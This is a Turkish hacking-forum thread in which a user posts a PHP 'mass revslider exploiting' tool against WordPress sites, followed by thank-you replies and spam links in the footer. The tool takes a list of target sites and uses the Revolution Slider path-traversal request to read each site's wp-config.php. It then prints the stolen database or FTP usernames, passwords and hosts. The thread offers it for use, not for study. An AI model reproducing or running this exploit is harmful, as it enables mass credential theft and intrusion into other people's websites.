Wordpress Revslide Açığı

F

fenerove

Forumdan Uzaklaştırıldı
Katılım
22 Ocak 2015
Mesajlar
1,664
Tepkime puanı
0
Puanları
0
Web sitesi
www.fenerove.com
[video=youtube]

Biraz eski bir açık ama yeniler öğrensin izlenmesinde fayda var :)


PHP: 
<body bgcolor="#000000" text="white">
<center>
<font face='courier' color=red size='+1'>
mass revslider exploiting<br>Fenerove - Spycod3<br>http://www.fenerove.com/ - http://ajanlar.org </font><br>
<form method='post'>
<textarea name='sites' cols='50' rows='12'></textarea><br>
<input type='submit' name='go' value='Exploit'>
</form>
<?php 

function findit($mytext,$starttag,$endtag) {
 $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
 $posRight = stripos($mytext,$endtag,$posLeft+1);
 return  substr($mytext,$posLeft,$posRight-$posLeft);
}
error_reporting(0);
set_time_limit(0);
$ya=$_POST['go'];
$co=$_POST['sites'];

if($ya){
 $e=explode("\r\n",$co);
 foreach($e as $bda){
	//echo '<br>'.$bda;
	$linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
	$dn=($bda).($linkof);
	$file=@file_get_contents($dn);
	if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
	echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
	echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
	echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
	echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
	echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
	echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
	}
	elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
	echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
	echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
	echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
	echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
	echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
	}
	else{echo "<center><font face='courier' color='yellow' >".$bda." ----> Bulunamadi </font></center>";}
	echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
 }
 
}

?>
 
KingDoz

KingDoz

Forumdan Uzaklaştırıldı
Katılım
23 Haz 2015
Mesajlar
1,403
Tepkime puanı
0
Puanları
0
Yaş
34
Eline saglık kanka
 
Sid3s

Sid3s

Özel Üye
Katılım
13 Ara 2014
Mesajlar
1,567
Tepkime puanı
0
Puanları
0
Web sitesi
sid3sblog.wordpress.com
Ellerine sağlık . Burdan T3'e selamlar :)
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort
Üst
Copyright® Ajanlar.org 2012